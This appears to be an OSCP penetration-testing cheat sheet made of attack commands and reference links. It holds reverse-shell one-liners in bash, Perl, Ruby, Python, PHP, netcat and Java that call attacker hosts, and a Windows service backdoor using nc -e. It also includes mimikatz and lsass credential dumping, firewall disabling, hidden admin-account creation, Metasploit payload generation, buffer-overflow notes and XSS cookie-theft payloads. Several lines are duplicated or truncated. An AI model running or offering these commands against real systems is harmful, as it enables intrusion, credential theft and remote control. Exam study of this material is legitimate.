OSCPֹ-Tal

OSCP Handy Commands

Nmap Full Web Vulnerable Scan:


mkdir /usr/share/nmap/scripts/vulscan

cd /usr/share/nmap/scrripts/vulscan

wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz

nmap -sS -sV –script=vulscan/vulscan.nse target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target

nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target

nmap -sV –script=vuln target

nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target


Dirb Directory Bruteforce:

dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt


Nikto Scanner:

nikto -C all -h http://IP


WordPress Scanner:

wpscan –url http://IP/ –enumerate p


Uniscan Scanning:

uniscan.pl -u target -qweds
HTTP Enumeration:

httprint -h http://www.example.com -s signatures.txt
SKIP Fish Scanner:

skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP


Uniscan Scanning:

uniscan –u http://www.hubbardbrook.org –qweds

Here, -q – Enable Directory checks
-w – Enable File Checks
-e – Enable robots.txt and sitemap.xml check
-d – Enable Dynamic checks
-s – Enable Static checks


Skipfish Scanning:

m-time threads -LVY donot update after result

skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP


Nmap Ports Scan:


1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)


1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)

2)fargement

3)data packed – like orginal one not scan packet

4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target

5) nmap –source-port 53 target


nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)

nmap -Pn -T2 -sV –randomize-hosts IP1,IP2

nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)

nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)

nmap -sA -PN -sN target

nmap -sS -sV -T5 -F -A -O target (version detection)

nmap -sU -v target (Udp)

nmap -sU -P0 (Udp)

nmap -sC 192.168.31.10-12 (all scan default)
Netcat Scanning:

nc -v -w 1 target -z 1-1000

for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done


US Scanning:

us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535


Unicornscan Scanning:

unicornscan X.X.X.X:a -r10000 -v


Kernel Scanning:

xprobe2 -v -p tcp:80:open 192.168.6.66


Samba Enumeartion:

nmblookup -A target

smbclient //MOUNT/share -I target -N

rpcclient -U “” target

enum4linux target


SNMP ENumeration:

snmpget -v 1 -c public IP version

snmpwalk -v 1 -c public IP

snmpbulkwalk -v 2 -c public IP


Windows Useful commands:


net localgroup Users

net localgroup Administrators

search dir/s *.doc

system(“start cmd.exe /k $cmd”)

sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore

/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779

mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits

C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits


Plink Tunnel:

plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X


Enable RDP Access:

reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable


Turn Off Firewall:

netsh firewall set opmode disable


Meterpreter:


run getgui -u admin -p 1234

run vnc -p 5043


Add User Windows:

net user test 1234 /add

net localgroup administrators test /add


Mimikatz:

privilege::debug

sekurlsa::logonPasswords full


Passing the Hash:

pth-winexe -U hash //IP cmd


Password Cracking using Hashcat:

hashcat -m 400 -a 0 hash /root/rockyou.txt


Netcat commands:

c:> nc -l -p 31337
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt


Banner Grabbing:

nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: SPOOFED-BROWSER
Referrer: K0NSP1RACY.COM
<enter>
<enter>


window reverse shell:


c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe
nc -lp 80


#nc -lp 31337 -e /bin/bash
nc 192.168.0.11 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000


Find all SUID root files:

find / -user root -perm -4000 -print


Find all SGID root files:

find / -group root -perm -2000 -print


Find all SUID and SGID files owned by anyone:

find / -perm -4000 -o -perm -2000 -print


Find all files that are not owned by any user:

find / -nouser -print


Find all files that are not owned by any group:

find / -nogroup -print


Find all symlinks and what they point to:

find / -type l -ls


Python:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

python -m SimpleHTTPServer (Starting HTTP Server)


PID:

fuser -nv tcp 80 (list PID of process)

fuser -k -n tcp 80 (Kill Process of PID)


Hydra:

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)


Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw


Compiling Exploit in Kali:

gcc -m32 -o output32 hello.c (32 bit)

gcc -o output hello.c (64 bit)


Compiling Windows Exploits on Kali:

cd /root/.wine/drive_c/MinGW/bin

wine gcc -o ability.exe /tmp/exploit.c -lwsock32

wine ability.exe


NASM Command:

nasm -f bin -o payload.bin payload.asm

nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload


SSH Pivoting:


ssh -D 127.0.0.1:1080 -p 22 user@IP

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains commands target


Pivoting to One Network to Another:


ssh -D 127.0.0.1:1080 -p 22 user1@IP1

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

Add socks4 127.0.0.1 1081 in /etc/proxychains.conf

proxychains commands target


Pivoting Using metasploit:


route add 10.1.1.0 255.255.255.0 1

route add 10.2.2.0 255.255.255.0 1

use auxiliary/server/socks4a

run

proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E


Exploit-DB search using CSV File:


searchsploit-rb –update

searchsploit-rb -t webapps -s WEBAPP

searchsploit-rb –search=”Linux Kernel”

searchsploit-rb -a “author name” -s “exploit name”

searchsploit-rb -t remote -s “exploit name”

searchsploit-rb -p linux -t local -s “exploit name”


For Privilege Escalation Exploit search:

cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3


Metasploit Payloads:


msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe

msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c


Create a Linux Reverse Meterpreter Binary

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell


Create Reverse Shell (Shellcode)

msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b “\x00\x0a\x0d”


Create a Reverse Shell Python Script

msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py


Create a Reverse ASP Shell

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t asp -o shell.asp


Create a Reverse Bash Shell

msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh


Create a Reverse PHP Shell

msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php

Edit shell.php in a text editor to add <?php at the beginning.


Create a Windows Reverse Meterpreter Binary

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell.exe


Security Commands In Linux:


find programs with a set uid bit

# find / -uid 0 -perm -4000


find things that are world writable

# find / -perm -o=w


find names with dots and spaces, there shouldn’t be any
# find / -name ” ” -print
# find / -name “..” -print
# find / -name “. ” -print
# find / -name ” ” -print


find files that are not owned by anyone
# find / -nouser


look for files that are unlinked

# lsof +L1


get information about procceses with open ports
# lsof -i


look for weird things in arp
# arp -a


look at all accounts including AD
# getent passwd


look at all groups and membership including AD

# getent group


list crontabs for all users including AD
# for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done


#generate random passwords
cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4


# find all immutable files, there should not be any
find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’


# fix immutable files
chattr -i file


Windows Buffer Overflow Exploitation Commands:


msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c


msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
COMMONLY USED BAD CHARACTERS:

\x00\x0a\x0d\x20                                            For http request
\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c           Ending with (0\n\r_)
Useful Commands:


pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )


!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh


!mona config -set workingfolder C:\Mona\%p
!mona config -get workingfolder
!mona mod
!mona bytearray -b “\x00\x0a”
!mona pc 5000
!mona po EIP
!mona suggest


SEH:

!mona suggest
!mona nosafeseh
nseh=”\xeb\x06\x90\x90″ (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)


ROP (DEP):

!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a’
!mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)


ASLR:

!mona noaslr


EGG Hunter:

!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t ‘w00t’


GDB Debugger Commands:
Setting Breakpoint :

break *_start


Execute Next Instruction :

next
step
n
s


Continue Execution :

continue
c


Data :

checking ‘REGISTERS’ and ‘MEMORY’
Display Register Values : (Decimal , Binary , Hex )

print /d –> Decimal
print /t –> Binary
print /x –> Hex
O/P :

(gdb) print /d $eax

$17 = 13

(gdb) print /t $eax
$18 = 1101

(gdb) print /x $eax
$19 = 0xd
(gdb)


Display values of specific memory locations :
command : x/nyz (Examine)

n –> Number of fields to display ==>
y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
Cheat Codes:


Reverse Shellcode:


BASH:

bash -i >& /dev/tcp/192.168.23.10/443 0>&1


exec /bin/bash 0&0 2>&0
exec /bin/bash 0&0 2>&0


0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196


0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196


exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
exec 5<>/dev/tcp/attackerip/4444


cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done


/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1


PERL:

Shorter Perl reverse shell that does not depend on /bin/sh:


perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’


perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’


If the target system is running Windows use the following one-liner:


perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’


perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’


perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’


perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’


RUBY:

Longer Ruby reverse shell that does not depend on /bin/sh:

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’


ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’


If the target system is running Windows use the following one-liner:
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’


ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’


ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’


ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’


PYTHON:


python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’


python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’


PHP:

This code assumes that the TCP connection uses file descriptor 3.


php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’

php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK


NETCAT:

Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:

nc -e /bin/sh attackerip 4444

nc -e /bin/sh 192.168.37.10 443


If the -e option is disabled, try this


mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe

mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe

/bin/sh | nc attackerip 4444

/bin/sh | nc 192.168.23.10 443

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/


If you have the wrong version of netcat installed, try


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f


TELNET:

If netcat is not available or /dev/tcp


mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe


XTERM:

Xterm is the best..


To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do this is with Xnest: It is available on Ubuntu.


Xnest :1 # Note: The command starts with uppercase X

Xnest :1 # Note: The command starts with uppercase X


Then remember to authorise on your system the target IP to connect to you:

xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server


xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab

xhost +targetip # Run this INSIDE the spawned xterm on the open X Server


If you want anyone to connect to this spawned xterm try:

xhost + # Run this INSIDE the spawned xterm on the open X Server

xhost + # Run this INSIDE the spawned xterm on the open X Server


Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:

xterm -display attackerip:1

xterm -display attackerip:1


Or:

$ DISPLAY=attackerip:0 xterm

$ DISPLAY=attackerip:0 xterm


It will try to connect back to you, attackerip, on TCP port 6001.

Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:


/usr/openwin/bin/xterm -display attackerip:1

/usr/openwin/bin/xterm -display attackerip:1


PHP:

php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’


JAVA:
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()


XSS Cheat Codes:


(“< iframes >  src=http://IP:PORT </ iframes >”)


<script>document.location=http://IP:PORT</script>


‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


”;!–“<XSS>=&amp;amp;{()}


<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>


<IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
<IMG SRC=”jav ascript:alert(‘XSS’);”>


perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out


<BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>


( “>< iframes http://google.de < iframes >)


<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>

“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

<img src=asdf onerror=alert(document.cookie)>


Useful Links To Read and Learn:
Enumeration:

http://www.0daysecurity.com/penetration-testing/enumeration.html


Windows Shellcode:

http://farlight.org/index.html?type=shellcode

http://shell-storm.org/shellcode/

http://www.windowsexploits.com/


XSS Cheat Codes:

http://www.xenuser.org/xss-cheat-sheet/

https://gist.github.com/sseffa/11031135

https://html5sec.org/


Reverse Shell Cheat Codes:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

http://roo7break.co.uk/?p=215


Webshells:

http://www.r57shell.net/


Nikto Tutorial:

http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/


Exploit-db:

wget http://exploit-db.com/archive.tar.bz2


SNMP Enumeration:

http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09

http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html


SAMBA Enumeration:

http://www.iodigitalsec.com/windows-null-session-enumeration/

http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions

http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html

http://www.madirish.net/59


Passhing The Hash:

https://www.kali.org/penetration-testing/passing-hash-remote-desktop/

https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/


Hashcat Tutorial:

http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/


Wordlist Download:

https://wiki.skullsecurity.org/Passwords

http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html


NASM Tutorial:

http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm


Buffer overflow Tutorial:


I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains exploit from basic to intermediate level with step by step debugging.


Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html


SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html


Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html


Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html


Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html


ADVANCED:


Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever seen).


Exploit writting tutorial part 1:Stack Based Overflows – http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/


Exploit writting tutorial part 2: Stack Based Overflows – jumping to shellcode – http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/


Exploit writting tutorial part 3: SEH Based Exploits – http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/


Exploit writting tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/


Exploit writting tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/


Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/


Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/


Exploit writting tutorial part 7: Unicode – from 0x00410041 to calc – http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/


Exploit writting tutorial part 8: Win32 Egg Hunting – http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/


Exploit writting tutorial part 9: Introduction to Win32 shellcoding – http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/


SQL Injection Cheat Codes:

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://resources.infosecinstitute.com/backdoor-sql-injection/


RFI/LFI Tutorials:

https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/

http://www.hackersonlineclub.com/lfi-rfi

https://0xzoidberg.wordpress.com/category/security/lfi-rfi/


NMAP Vulsan:

http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz


Online Hash Cracking:

http://www.objectif-securite.ch/


Dump Windows Password Hashes:

http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html


Windows Previlige Escalation:

http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html


Linux Previlige Escalation:

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://www.rebootuser.com/?p=1758


Tunneling & Port Forwarding:

http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)
http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html
http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
http://www.offensive-security.com/metasploit-unleashed/Portfwd
http://www.offensive-security.com/metasploit-unleashed/Pivoting
http://www.howtoforge.com/reverse-ssh-tunneling
http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)
http://www.offensive-security.com/metasploit-unleashed/Msfvenom


Useful Links:

http://www.fuzzysecurity.com/tutorials.html – Exploit tutorials
https://www.corelan.be/index.php/articles/ – Exploit tutorials
http://www.securitytube.net/ – Training videos
http://www.offensive-security.com/blog/ – Offensive Security blog
http://blog.g0tmi1k.com/ – Security blog
http://carnal0wnage.attackresearch.com
http://cybershakti.my3gb.com/
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.securityfocus.com/
http://www.exploit-db.com/
http://nmap.org/nsedoc/
http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
http://www.fuzzysecurity.com/tutorials/16.html
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://pentestmonkey.net/tools/windows-privesc-check


Videos:

http://www.securitytube.net/
http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)
http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Secuirty Lectures)


Privilege Escalation in Windows:

http://www.youtube.com/watch?v=kMG8IsCohHA Encyclopaedia Of Windows Privilege Escalation – Brett Moore
http://www.youtube.com/watch?v=_8xJaaQlpBo DerbyCon 3 0 2105 Windows Attacks At Is The New Black Rob Fuller And Chris Gates
http://www.greyhathacker.net/?p=738 Elevating privileges by exploiting weak folder permissions


Buffer Overflow Tutorial:

http://www.frequency.com/video/athcon-hack-in-paris-demo-1/40181156
http://www.savevid.com/video/athcon-hack-in-paris-demo-2.html
http://www.frequency.com/video/athcon-hack-in-paris-demo-3/11306148


https://www.youtube.com/watch?v=ANlROJNWtCs&list=PLM0IiVYClP2vC3A6Uz_ESV86kBVYei5qx (Python Penetration Testing)

https://www.youtube.com/watch?v=Sye3mu-EoTI (Bash Scripting by Peter Chubb)

https://www.youtube.com/watch?v=GPjcSxyIIUc (BASH Scripting by Lee Baird )

https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)

https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)

http://www.securitytube.net/video/7640 (Simple buffer overflow)

https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)

http://www.securitytube.net/video/7735 (Avoiding bad characters)
PDF:

https://www.yumpu.com/en/document/view/14963680/from-sqli-to-shell (SQL Injection)

https://cyberwar.nl/d/hak5.org_LinuxUnixBSDPost-ExploitationCommandList_copy-20130228.pdf (Linux Unix Post Exploitation Command)

http://www.scribd.com/doc/245679444/hak5-org-OSXPost-Exploitation-copy-20130228-pdf#scribd (Post Exploitation Command List)

http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)

http://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation.pdf (PHP Include and Post Exploitation)


Best Book I refer:

http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641


Windows compiled Exploit Reference:


Those  who have not enough lab time to compile their windows exploit, I will  recommend you to download and compile the Mike Czumak  Windows pre-compiled reference chart. I compiled it using Visual Studio  and GNU Code-blocks, really it will very useful at the time of exam.

